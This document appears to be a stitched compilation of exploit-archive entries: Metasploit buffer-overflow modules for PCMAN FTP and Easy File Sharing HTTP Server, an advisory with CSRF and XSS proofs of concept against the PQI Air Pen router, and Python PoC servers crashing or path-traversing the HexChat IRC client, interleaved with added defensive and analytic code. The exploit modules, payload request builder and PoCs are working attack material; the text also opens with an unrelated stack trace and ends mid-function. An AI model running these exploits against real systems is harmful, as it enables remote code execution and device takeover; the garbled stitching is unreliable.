0bb14c40 67fe733d verifier_67fe0000!AVrfpDphReportCorruptedBlock+0x10c
0bb14ca4 67fe7495 verifier_67fe0000!AVrfpDphFindBusyMemoryNoCheck+0x7d
0bb14cc8 67feb651 verifier_67fe0000!AVrfpDphFindBusyMemory+0x15
0bb14ce0 67ff0b12 verifier_67fe0000!AvrfpDphCheckPageHeapAllocation+0x41
0bb14cf0 67f93246 verifier_67fe0000!VerifierCheckPageHeapAllocation+0x12
0bb14d4c 60dca53f vfbasics+0x13246
0bb14d68 604cce4e MSHTML!MemoryProtection::HeapFree+0x46
0bb14d70 60b07866 MSHTML!ProcessHeapFree+0x10
0bb14d88 60baac6b MSHTML!CSVGHelpers::SetAttributeStringAndPointer<CRectF,CSVGRect>+0xb6
0bb14de8 60e18b69 MSHTML!PROPERTYDESC::HandleStringProperty+0x110
0bb14e14 607e30e6 MSHTML!PROPERTYDESC::CallHandler+0x855996
0bb14e54 60b83323 MSHTML!CElement::SetAttributeFromPropDesc+0xbe
0bb14ee4 607e2f44 MSHTML!CElement::ie9_setAttributeNSInternal+0x2ee
-->
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PCMAN FTP Server Buffer Overflow - PUT Command',
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in the PUT command of the
          PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
          credentials are enabled.
      },
      'Author'         =>
          [
            'Jay Turla',      # Initial Discovery -- @shipcod3
            'Chris Higgins'   # msf Module -- @ch1gg1ns
          ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'EDB',   '37731'],
          [ 'OSVDB',   '94624']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'Space'   => 1000,
          'BadChars'  => "\x00\x0A\x0D",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP3 English',
            {
              'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll
              'Offset' => 2007
            }
          ],
        ],
      'DisclosureDate' => 'Aug 07 2015',
      'DefaultTarget'  => 0))
  end

  def check
    connect_login
    disconnect

    if /220 PCMan's FTP Server 2\.0/ === banner
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end


  def exploit
    connect_login

    print_status('Generating payload...')
    sploit = rand_text_alpha(target['Offset'])
    sploit << [target.ret].pack('V')
    sploit << make_nops(16)
    sploit << payload.encoded

    send_cmd( ["PUT", sploit], false )
    disconnect
  end

end
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy File Sharing HTTP Server 7.2 SEH Overflow',
      'Description'    => %q{
        This module exploits a SEH overflow in the Easy File Sharing HTTP Server 7.2 software.
      },
      'Author'         => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'EDB', '39008' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'RPORT'    => 80        # merged here: a second 'DefaultOptions' key would silently discard EXITFUNC
        },
      'Payload'        =>
        {
          'Space'    => 390,
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ],  # address written over the SEH handler
        ],
      'DisclosureDate' => 'Dec 2 2015',
      'DefaultTarget'  => 0))
  end

  def print_status(msg='')
    super("#{peer} - #{msg}")
  end

  def exploit
    connect
    print_status("Sending exploit...")
    sploit = "GET "
    sploit << rand_text_alpha_upper(4061)
    sploit << generate_seh_record(target.ret)
    sploit << make_nops(19)
    sploit << payload.encoded
    sploit << make_nops(7)
    sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20)
    sploit << " HTTP/1.0\r\n\r\n"
    sock.put(sploit)
    print_good("Exploit Sent")
    handler
    disconnect
  end
end
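The module above fixes the request layout (4061 bytes of filler, the 8-byte nSEH/SEH record, 19 NOPs, the payload, 7 NOPs and padding) and a BadChars list that is unusually long because the buffer travels inside a URL path. The block below is an added example, not part of the Metasploit module or of Easy File Sharing: it rebuilds that request in Python, reports every payload byte that collides with the BadChars list, and exposes the offset of each element so the layout can be checked against a debugger. The nSEH short jump (`EB 06` plus two NOPs) is the conventional record shape and an assumption here rather than Metasploit's exact `generate_seh_record` output; the payload used in `main` is a constructed stand-in (INT3 bytes), not shellcode.

```python
import struct

# Layout constants taken from the module above.
NSEH_OFFSET = 4061           # filler bytes before the nSEH/SEH record
SEH_HANDLER = 0x10019798     # target 'Ret': address written over the SEH handler
PAYLOAD_SPACE = 390          # module's Payload 'Space'
PATH_LEN = 4486              # what the module's padding arithmetic works out to for any payload size
BADCHARS = b"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"


def find_badchars(data, badchars=BADCHARS):
    """Return [(offset, byte), ...] for every byte of data that is in badchars."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def payload_is_clean(payload, badchars=BADCHARS):
    """True when no byte of the payload collides with the BadChars list."""
    return not find_badchars(payload, badchars)


def seh_record(handler):
    """nSEH = short jump forward over the SEH pointer (EB 06 + two NOPs),
    followed by the handler address as a 32-bit process reads it.
    Assumption: conventional record shape, not Metasploit's exact bytes."""
    return b"\xeb\x06\x90\x90" + struct.pack("<I", handler)


def layout(payload_len):
    """Offset of each element inside the URL path, for cross-checking
    against the stack in a debugger."""
    nseh = NSEH_OFFSET
    seh = nseh + 4
    nops = seh + 4
    shell = nops + 19
    return {"nseh": nseh, "seh": seh, "nops": nops,
            "payload": shell, "payload_end": shell + payload_len}


def build_request(payload):
    """Assemble 'GET <path> HTTP/1.0' with the module's layout, but refuse a
    payload that is too large or carries a bad character. Fixed 'A'/'B'
    filler stands in for the module's random upper-case text."""
    if len(payload) > PAYLOAD_SPACE:
        raise ValueError("payload is %d bytes, module allows %d"
                         % (len(payload), PAYLOAD_SPACE))
    bad = find_badchars(payload)
    if bad:
        raise ValueError("payload contains BadChars at %r" % bad[:8])
    path = b"A" * NSEH_OFFSET
    path += seh_record(SEH_HANDLER)
    path += b"\x90" * 19
    path += payload
    path += b"\x90" * 7
    path += b"B" * (PATH_LEN - len(path))
    return b"GET " + path + b" HTTP/1.0\r\n\r\n"


if __name__ == "__main__":
    # Constructed stand-in for shellcode: 32 INT3 breakpoints, no bad characters.
    req = build_request(b"\xcc" * 32)
    print(len(req), layout(32))
```

Running `find_badchars` over a freshly encoded payload before sending is the check the module's `BadChars` option delegates to the encoder; doing it explicitly shows which bytes (0x20, 0x2f, 0x25 and the rest) are the reason an unencoded stager cannot ride in this URL.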
            
                         _ _ _       _
                        | | | |     | |
  ___  _ ____      _____| | | | __ _| |__  ___
 / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|   	
| (_) | |   \ V  V /  __/ | | | (_| | |_) \__ \
 \___/|_|    \_/\_/ \___|_|_|_|\__,_|_.__/|___/
		
		Security Advisory
		   2016-04-03
		www.orwelllabs.com
		Twitter:@orwelllabs

				magicword: d0ubl3th1nk1ng...


Overview
=======
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: PQI Group
Affected Products: PQI Air Pen Express - Wireless Router 6W51-0000R2 and
6W51-0000R2XXX
Credits: Discovered and researched by Orwelllabs
Advisory URL:
http://www.orwelllabs.com/2016/04/pqi-air-pen-express-wireless-router.html


Issues
=====
I. Multiple Cross-Site Request Forgery (CSRF) (CWE-352)
II. Multiple Stored Cross-site Scripting (CWE-79)
III. Multiple Reflected Cross-Site Scripting (CWE-79)
IV. Insecure Direct Request
V. Insecure Default Permissions (CWE-276)
VI. No SSL


background
=========
The smart lipstick-shaped PQI Air Pen express is the world's smallest
wireless router/access point combo you can get today.
PQI Air Pen express can be powered via an external adapter or a powered USB
port on your computer and provides an excellent wireless experience for
everyone.


I. Cross-Site Request Forgery (CSRF) (CWE-352)
```````````````````````````````````````````````````````````````````````
If a user visits the page below, it sets the administrative credentials
of the PQI Air Pen express to "root:r00t":

<html>
<!-- CSRF PoC -->
<body>
<form action="http://{airpenXweb}/goform/setSysAdm" method="POST">
<input type="hidden" name="admuser" value="root" />
<input type="hidden" name="admpass" value="r00t" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>


The attacker can also abuse the multiple XSS issues in this device to exploit
this vulnerability; the following, for example, sets the same credentials
'root:r00t' (the injected script src reaches setSysAdm with a plain GET):

http://
{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22
http://airpenXweb/goform/setSysAdm?admuser=root&admpass=r00t%22%3E%3C/script%3E%3C!--


The following PoC sets the 3G dial-up credentials of the access point to
"3groot:3gr00t" (and of course, any other value could be set in this way):

<html>
<!-- CSRF PoC2 -->
<body>
<form action="http://{airpenXweb}/goform/setWan" method="POST">
<input type="hidden" name="connectionType" value="DHCP" />
<input type="hidden" name="staticIp" value="xxx&#46;xxx&#46;xxx&#46;xxx" />
<input type="hidden" name="staticNetmask" value="255&#46;255&#46;255&#46;0"
/>
<input type="hidden" name="staticGateway"
value="xxx&#46;xxx&#46;xxx&#46;xxx" />
<input type="hidden" name="staticPriDns" value="xxx&#46;xxx&#46;xxx&#46;x"
/>
<input type="hidden" name="staticSecDns" value="xxx&#46;xxx&#46;xxx&#46;x"
/>
<input type="hidden" name="hostname" value="" />
<input type="hidden" name="pppoeUser" value="pppoe&#95;user" />

<input type="hidden" name="pppoePass" value="pppoe&#95;passwd" />
<input type="hidden" name="pppoePass2" value="pppoe&#95;passwd" />
<input type="hidden" name="pppoeOPMode" value="KeepAlive" />
<input type="hidden" name="pppoeRedialPeriod" value="60" />
<input type="hidden" name="pppoeIdleTime" value="5" />
<input type="hidden" name="l2tpServer" value="l2tp&#95;server" />
<input type="hidden" name="l2tpUser" value="l2tp&#95;user" />
<input type="hidden" name="l2tpPass" value="l2tp&#95;passwd" />
<input type="hidden" name="l2tpMode" value="0" />
<input type="hidden" name="l2tpIp" value="192&#46;168&#46;1&#46;1" />
<input type="hidden" name="l2tpNetmask" value="255&#46;255&#46;255&#46;0"
/>
<input type="hidden" name="l2tpGateway" value="192&#46;168&#46;1&#46;254"
/>
<input type="hidden" name="l2tpOPMode" value="KeepAlive" />
<input type="hidden" name="l2tpRedialPeriod" value="60" />
<input type="hidden" name="pptpServer" value="pptp&#95;server" />
<input type="hidden" name="pptpUser" value="pptp&#95;user" />
<input type="hidden" name="pptpPass" value="pptp&#95;passwd" />
<input type="hidden" name="pptpMode" value="0" />
<input type="hidden" name="pptpIp" value="192&#46;168&#46;1&#46;1" />
<input type="hidden" name="pptpNetmask" value="255&#46;255&#46;255&#46;0"
/>
<input type="hidden" name="pptpGateway" value="192&#46;168&#46;1&#46;254"
/>
<input type="hidden" name="pptpOPMode" value="KeepAlive" />
<input type="hidden" name="pptpRedialPeriod" value="60" />
<input type="hidden" name="APN3G" value="" />
<input type="hidden" name="PIN3G" value="" />
<input type="hidden" name="Dial3G" value="" />
<input type="hidden" name="User3G" value="3groot" />          <!-- 3G user -->
<input type="hidden" name="Password3G" value="3gr00t" />      <!-- 3G password -->
<input type="hidden" name="Dev3G" value="Auto" />
<input type="hidden" name="macCloneEnbl" value="0" />
<input type="hidden" name="macCloneMac" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
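Both CSRF PoCs above work because the /goform handlers act on any well-formed POST, and the XSS chain works because setSysAdm also acts on a GET issued by an injected script src. The same pattern reappears further down this page in the MOBOTIX /admin/access and /admin/acl forms. The block below is an added example, not code from the advisory or from the PQI or MOBOTIX firmware: it models the check such a handler should perform before applying a configuration change. Requests are constructed dicts; "airpenXweb" is the advisory's placeholder for the device address, "attacker.example", the "csrf_token" field name and the sample values are assumptions.

```python
from urllib.parse import urlsplit

STATE_CHANGING = {"POST", "PUT", "DELETE"}


def request_origin_host(headers):
    """Host the browser reports as the source of the request: Origin first,
    then Referer (some browsers omit Origin on same-origin POSTs). Returns
    None when neither is usable, which includes 'Origin: null'."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).hostname
    return None


def allow_state_change(request, device_host, session_token=None):
    """Server-side gate for a /goform handler (or the camera's /admin/access).
    Returns (ok, reason). Three layers: reject GET outright so <script src>
    and <img src> tricks cannot change settings, require the browser-supplied
    origin to be the device itself, and, when the session carries a token,
    require it in the form body."""
    if request["method"].upper() not in STATE_CHANGING:
        return False, "configuration changes must not be accepted via GET"
    host = request_origin_host(request.get("headers", {}))
    if host is None:
        return False, "no Origin/Referer to attribute the request to"
    if host.lower() != device_host.lower():
        return False, "cross-site request from %s" % host
    if session_token is not None:
        if request.get("form", {}).get("csrf_token") != session_token:
            return False, "missing or stale csrf_token"
    return True, "ok"


DEVICE = "airpenXweb"   # the advisory's placeholder for the router's address

# Constructed sample requests.
# 1. Legitimate submission from the device's own management page.
LEGIT = {"method": "POST", "path": "/goform/setSysAdm",
         "headers": {"Origin": "http://airpenXweb",
                     "Referer": "http://airpenXweb/adm/management.asp"},
         "form": {"admuser": "admin", "admpass": "hunter2", "csrf_token": "t0k3n"}}
# 2. The advisory's CSRF PoC, auto-submitted from an attacker-controlled page.
CSRF_POC = {"method": "POST", "path": "/goform/setSysAdm",
            "headers": {"Origin": "http://attacker.example",
                        "Referer": "http://attacker.example/poc.html"},
            "form": {"admuser": "root", "admpass": "r00t"}}
# 3. The XSS chain: the injected <script src="http://airpenXweb/goform/setSysAdm?..."> arrives
#    as a same-origin GET, so only the method rule stops it.
XSS_GET = {"method": "GET", "path": "/goform/setSysAdm?admuser=root&admpass=r00t",
           "headers": {"Referer": "http://airpenXweb/"},
           "form": {}}


if __name__ == "__main__":
    for name, req in (("legit", LEGIT), ("csrf_poc", CSRF_POC), ("xss_get", XSS_GET)):
        print(name, allow_state_change(req, DEVICE, "t0k3n"))
```

The token layer is there for browsers that send neither header; it does not protect against script already running on the device's origin, which can read the token and POST it. That is why the stored and reflected XSS in sections II and III have to be fixed alongside the CSRF, not instead of it.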


II. Stored Cross-site Scripting (CWE-79)
``````````````````````````````````````````````````````````
"Wide Area Network (WAN) Settings"

# PocParameter: "hostname"
http://{airpenXweb}/goform/setWan?connectionType=DHCP&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=&staticPriDns=&staticSecDns=xxx.xxx.xxx.xxx&hostname=[
* STOREDXSS
*]&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=


"Webs URL Filter Settings"

# PocParameter: "addURLFilter"
http://{airpenXweb}/goform/websURLFilter?addURLFilter=[ *STOREDXSS*
]&addwebsurlfilter=Add

Requesting this page will then show a pop-up with the content of the JavaScript
payload:
http://{airpenXweb}/firewall/content_filtering.asp

# Parameter: "addHostFilter"
http://{airpenXweb}/goform/websHostFilter?addHostFilter=[ *STOREDXSS*
]&addwebscontentfilter=Add


III. Reflected Cross-Site Scripting (CWE-79)
``````````````````````````````````````````````````````````````
Virtually all application inputs are vulnerable to cross-site scripting,
since no validation whatsoever is performed on the data provided by the
user.
Below are some examples:


"Basic Wireless Settings"

# PocParameter: "mssid_0"
http://{airpenXweb}/goform/wirelessBasic?radiohiddenButton=2&wifihiddenButton=2&wirelessmode=9&bssid_num=1&mssid_0=[*
XSS *
]&mssid_1=&mssid_2=&mssid_3=&mssid_4=&mssid_5=&mssid_6=&mssid_8=&mssid_9=&mssid_10=&mssid_11=&mssid_12=&mssid_13=&mssid_14=&mssid_15=&broadcastssid=1&apisolated=0&mbssidapisolated=0&sz11gChannel=1&n_mode=0&n_bandwidth=1&n_gi=1&n_mcs=33&n_rdg=1&n_extcha=1&n_stbc=1&n_amsdu=0&n_autoba=1&n_badecline=0&n_disallow_tkip=1&n_2040_coexit=1&tx_stream=1&rx_stream=1

# PocParameter: "ssid"
http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=[ * XSS *
]&security_mode=Disable&wzsecureAlgorithm=AES

# PocParameter: "connectionType" (the User3G value carries a second payload)
http://{airpenXweb}/goform/setWan?connectionType=[ -*- XSS
-*-]&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=xxx.xxx.xxx.xxx&staticPriDns=xxx.xxx.xxx.xxx5&staticSecDns=203.185.0.36&hostname=tiat&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=%3Cscript%3Ealert%281%29%3C/script%3E&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=

# Parameter: "admpass"
http://{airpenXweb}/goform/setSysAdm?admuser=root&admpass=[ -*- XSS -*- ]

IV. Insecure Direct Request
````````````````````````````````````````
This device allows remote attackers to obtain sensitive information,
including every credential it holds, via a direct request to
/cgi-bin/ExportSettings.sh.

PoC:
http://{airpenXweb}/cgi-bin/ExportSettings.sh

V. Insecure Default Permissions (CWE-276)
``````````````````````````````````````````````````````````````
The device description on the vendor's site makes it very clear that the
priority is to make everything, including setup, as easy as possible.
Consequently, configuring a password is not mandatory, neither for the web
interface nor for connecting to the AP, and hundreds of these completely
unprotected APs can be found as a result.

VI. No SSL
``````````````````
Every action, whether sensitive or not, is transmitted in plain text because
HTTPS is not used at any step.

POST /goform/setSysAdm HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101
Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/adm/management.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

admuser=ORWL_user&admpass=ORWL_pass

Timeline
=======
2015-10-25 - Issues discovered
2015-11-04 - Vendor contacted
2015-12-12 - Another attempt to contact the Vendor...
2016-02-26 - Public Disclosure
* There is no easy way to contact the vendor. Emails sent remain unanswered,
as do the contact forms on the site.
            
#!/usr/bin/python
#
####################
# Meta information #
####################
# Exploit Title: Hexchat IRC client - CAP LS Handling Stack Buffer Overflow
# Date: 2016-02-07
# Exploit Author: PizzaHatHacker
# Vendor Homepage: https://hexchat.github.io/index.html
# Software Link: https://hexchat.github.io/downloads.html
# Version: 2.11.0
# Tested on: HexChat 2.11.0 & Linux (64 bits) + HexChat 2.10.2 & Windows 8.1 (64 bits)
# CVE : CVE-2016-2233

#############################
# Vulnerability description #
#############################
'''
Stack Buffer Overflow in src/common/inbound.c :
void inbound_cap_ls (server *serv, char *nick, char *extensions_str, const message_tags_data *tags_data)

In this function, the HexChat IRC client receives the available extensions from
the IRC server (CAP LS message) and constructs the request string that later
indicates which ones to use (CAP REQ message).
This request string is stored in the fixed-size (256-byte) array 'buffer'.
The buffer has enough space for all supported options combined, BUT it
overflows if the server repeats options, since every occurrence is appended.

CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Base Score : 7.5
Impact Subscore : 6.4
Exploitability Subscore : 10
'''

####################
# Proof of Concept #
####################
'''
* Install Hexchat IRC Client
* Run this Python script on a (server) machine
* Connect to the server running the script
* Results : Hexchat will crash (most probably access violation/segmentation fault)
'''

import socket

# Exploit configuration
HOST = ''                          # listen on all interfaces
PORT = 6667
SERVERNAME = 'irc.example.com'
OPTIONS = 'multi-prefix ' * 100    # 13*100 = 1300 bytes > 256-byte 'buffer'

# Create server socket and wait for the client to connect
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	sock.bind((HOST, PORT))    # Bind to port
	sock.listen(0)             # Start listening on socket

	print('Server listening, waiting for connection...')
	conn, addr = sock.accept()

	print('Connected with %s:%d, sending packets...' % (addr[0], addr[1]))
	# One CAP LS reply that lists the same supported capability 100 times:
	# the client appends every listed option it wants to its CAP REQ string.
	conn.send((':' + SERVERNAME + ' CAP * LS :' + OPTIONS + '\r\n').encode())

	# Wait and close socket
	conn.recv(256)
	sock.close()

	print('Done.')

except socket.error as msg:
	print('Network error : ' + str(msg))
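The description above pins the bug on an unbounded append loop over server-supplied tokens: unique capabilities fit in 256 bytes, repeated ones do not. The block below is an added example, not HexChat's code or the PoC author's: it parses a CAP LS line the way an IRC bouncer or a server-side log filter would, models both the unbounded construction and a bounded, de-duplicated one, and flags lines that would overflow. The list of "wanted" capabilities is a representative assumption, not HexChat's actual request list; the two sample lines are constructed.

```python
# Representative capabilities a client might request when offered
# (an assumption for this model, not HexChat's actual list).
WANTED_CAPS = frozenset([
    "multi-prefix", "sasl", "away-notify", "account-notify",
    "extended-join", "server-time", "userhost-in-names", "identify-msg",
])
CAP_BUFFER_SIZE = 256   # size of the fixed 'buffer' named in the advisory


def parse_irc_line(line):
    """Split one IRC line into (prefix, command, params). The trailing
    parameter (after ' :') is kept whole, as RFC 1459 specifies."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    if " :" in line:
        head, trailing = line.split(" :", 1)
        params = head.split() + [trailing]
    else:
        params = line.split()
    return prefix, params[0], params[1:]


def cap_ls_tokens(line):
    """Capability tokens advertised in a 'CAP * LS' message, or None if the
    line is something else."""
    _, command, params = parse_irc_line(line)
    if command != "CAP" or len(params) < 3 or params[1] != "LS":
        return None
    return params[-1].split()


def build_cap_req_unbounded(tokens, wanted=WANTED_CAPS):
    """Model of the vulnerable construction: every advertised token the
    client wants is appended once per occurrence, with no length bound."""
    req = "CAP REQ :"
    for tok in tokens:
        if tok in wanted:
            req += tok + " "
    return req.rstrip()


def build_cap_req_bounded(tokens, wanted=WANTED_CAPS, bufsize=CAP_BUFFER_SIZE):
    """Hardened variant: request each wanted capability at most once and
    stop before the string (plus its NUL) could exceed the buffer."""
    req = "CAP REQ :"
    seen = set()
    for tok in tokens:
        if tok not in wanted or tok in seen:
            continue
        piece = tok + " "
        if len(req) + len(piece) >= bufsize:
            break
        req += piece
        seen.add(tok)
    return req.rstrip()


def cap_ls_overflows(line, bufsize=CAP_BUFFER_SIZE):
    """Detection: True if this CAP LS line would push the unbounded request
    past bufsize (the terminating NUL counted)."""
    tokens = cap_ls_tokens(line)
    if tokens is None:
        return False
    return len(build_cap_req_unbounded(tokens)) + 1 > bufsize


def has_repeated_caps(line):
    """True if any capability appears more than once in a CAP LS line."""
    tokens = cap_ls_tokens(line) or []
    return len(tokens) != len(set(tokens))


# Constructed sample lines: the PoC's reply and a normal server reply.
POC_LINE = ":irc.example.com CAP * LS :" + "multi-prefix " * 100 + "\r\n"
BENIGN_LINE = ":irc.example.com CAP * LS :multi-prefix sasl away-notify extended-join\r\n"

if __name__ == "__main__":
    for line in (BENIGN_LINE, POC_LINE):
        toks = cap_ls_tokens(line)
        print(len(toks), "tokens, overflow:", cap_ls_overflows(line),
              "repeated:", has_repeated_caps(line),
              "bounded ->", build_cap_req_bounded(toks))
```

The bounded variant is the shape of fix that matters here: de-duplicating alone is not enough if the server can advertise arbitrarily many distinct tokens the client wants, and bounding alone still lets a repeated token crowd out the real ones, so both are applied.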
            
#!/usr/bin/python
#
####################
# Meta information #
####################
# Exploit Title: Hexchat IRC client - Server name log directory traversal
# Date: 2016-01-26
# Exploit Author: PizzaHatHacker
# Vendor Homepage: https://hexchat.github.io/index.html
# Software Link: https://hexchat.github.io/downloads.html
# Version: 2.11.0
# Tested on: HexChat 2.11.0 & Linux (64 bits)
# CVE : CVE-2016-2087

#############################
# Vulnerability description #
#############################
'''
Server Name Directory Traversal in src/common/text.c :
static char * log_create_pathname (char *servname, char *channame, char *netname)

In this function, channame (channel name) and netname (network name as 
configured in the client software) are sanitized to prevent directory 
traversal issues when creating a logfile BUT servname (server-provided
information) is NOT sanitized before possibly being injected into 
the file path via the 'log_insert_vars' function call.

This bug could be triggered in the special (non-default) configuration
where a user would have :
* Enabled logging (Settings > Preferences > Chatting > Logging)
* Used a pattern containing '%s' in the log filepath (instead 
of the default = '%n\%c.log').

When connecting to a malicious server, Hexchat IRC client may create or modify
arbitrary files on the filesystem with the permissions of the IRC client user
(non-root). For example, the following directories are accessible easily :
* <Hexchat-Conf>/addons : Executable plugin files that are automatically loaded
when starting Hexchat IRC client
* <Hexchat-Conf>/logs : ALL logfiles (from other servers too)
* <Hexchat-Conf>/scrollback : Scrollback text that is automatically 
loaded when entering a channel/server (this may trigger further bugs)
* <Hexchat-Conf>/sounds : Sounds that may be played on demand via CTCP
SOUND messages (this could also trigger further bugs)
* etc.

CVSS v2 Vector : (AV:N/AC:H/Au:N/C:N/I:P/A:P)
CVSS Base Score : 4
Impact Subscore : 4.9
Exploitability Subscore : 4.9
'''

####################
# Proof of Concept #
####################
'''
* Install Hexchat IRC Client
* Settings > Preferences > Chatting > Logging : Enable logging and use the log
filepath pattern : '%s\%c.log' (without the quotes)
* Run this Python script on a (server) machine
* Connect to the server running the script
* Results : A 'PIZZA' directory will appear in <Hexchat-Conf>/PIZZA instead
of something like <Hexchat-Conf>/logs/___PIZZA
'''

import socket

# Exploit configuration
HOST = ''                  # listen on all interfaces
PORT = 6667
SERVERNAME = '../PIZZA'    # server name with a path separator; it ends up in the log path via '%s'

# Create server socket and wait for the client to connect
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	sock.bind((HOST, PORT))    # Bind to port
	sock.listen(0)             # Start listening on socket

	print('Server listening, waiting for connection...')
	conn, addr = sock.accept()

	print('Connected with %s:%d, sending packets...' % (addr[0], addr[1]))
	# The 001 welcome carries the server name in its prefix; that is what the
	# client records as servname and later substitutes into the log filepath.
	conn.send((':' + SERVERNAME + ' 001 bob :Welcome to the Internet Relay Network\r\n').encode())

	# Wait and close socket
	conn.recv(256)
	sock.close()

	print('Done.')

except socket.error as msg:
	print('Failure binding to port : ' + str(msg))
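The description above says channame and netname are sanitized but servname is not, and the PoC expects the fixed client to produce something like <Hexchat-Conf>/logs/___PIZZA instead of a directory above logs. The block below is an added example, not HexChat's code or the PoC author's: a log-path builder that substitutes %s, %c and %n the way the page describes, with the missing servname sanitization switchable on and off, and a containment check that rejects any result outside the logs directory. The sanitization rule (allow letters, digits, '#', '_', '.', '-', replace everything else and any leading dots with '_') is my own choice, made so that '../PIZZA' becomes '___PIZZA'; the configuration directory and names are constructed. The example uses '/' in the pattern since the PoC was run on Linux.

```python
import posixpath
import re

LOG_SUBDIR = "logs"
_UNSAFE = re.compile(r"[^A-Za-z0-9#_.\-]")   # separators, ':' and NUL all become '_'


def sanitize_component(name):
    """Make a server-, channel- or network-supplied name usable as exactly
    one path component: replace separators and odd characters with '_' and
    turn leading dots into '_' so '.' and '..' cannot survive.
    (Assumed rule; chosen to reproduce the ___PIZZA form the PoC expects.)"""
    s = _UNSAFE.sub("_", name)
    stripped = s.lstrip(".")
    s = "_" * (len(s) - len(stripped)) + stripped
    return s or "_"


def is_inside(base, path):
    """True if path, lexically normalised, stays at or below base."""
    base = posixpath.normpath(base)
    path = posixpath.normpath(path)
    return path == base or path.startswith(base + "/")


def expand_pattern(pattern, servname, channame, netname):
    """Substitute %s, %c, %n and %% in the user's log-file pattern."""
    repl = {"s": servname, "c": channame, "n": netname, "%": "%"}
    return re.sub(r"%([scn%])", lambda m: repl[m.group(1)], pattern)


def build_log_path(confdir, pattern, servname, channame, netname, fixed=True):
    """Log-file path for a connection. channame and netname are always
    sanitized (as the page says the original does); servname only when
    fixed=True, so fixed=False reproduces the vulnerable behaviour."""
    channame = sanitize_component(channame)
    netname = sanitize_component(netname)
    if fixed:
        servname = sanitize_component(servname)   # the step missing in 2.11.0
    logs = posixpath.join(confdir, LOG_SUBDIR)
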